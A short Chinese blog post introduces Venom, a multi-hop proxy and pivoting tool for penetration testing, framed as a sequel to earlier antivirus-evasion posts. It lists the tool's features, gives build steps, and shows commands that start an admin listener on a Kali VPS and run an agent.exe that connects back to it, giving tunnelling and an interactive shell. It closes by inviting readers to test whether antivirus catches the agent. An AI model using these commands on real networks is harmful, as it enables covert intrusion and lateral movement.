在前期的文章中，我们讲到过很多次关于免杀的文章。由于时效问题，很多方法已经不能免杀了。本文为大家介绍另外一种基于Go开发的多级代理工具Venom

Venom可将多个节点进行连接，然后以节点为跳板，构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网，并轻松地管理代理节点。

作者项目地址：https://github.com/Dliv3/Venom

功能特性

• 可视化网络拓扑
• 多级socks5代理
• 多级端口转发
• 端口复用 (apache/mysql/...)
• ssh隧道
• 交互式shell
• 文件的上传和下载
• 节点间通信加密
• 支持多种平台(Linux/Windows/MacOS)和多种架构(x86/x64/arm/mips)

安装

我们可以利用下面的命令，进行编译安装。

go get -u github.com/Dliv3/Venom/...
# $GOPATH是安装Go时配置的环境变量，可通过go env命令查看
cd $GOPATH/src/github.com/Dliv3/Venom
# 编译好的二进制文件存放在当前目录下的release文件夹中
./build.sh

当然可以直接下载使用release中编译好的可执行文件.

测试

admin监听端口，agent发起连接: 在 vps ( kali ) 上 , 上传 admin 端，执行下面命令

./admin_linux_x64 -lport 8888 -passwd kali

连接

agent.exe -rhost 192.168.123.57 -rport 8888 -passwd kali

360 电脑管家等平台尚未测试，大家可以自行测试。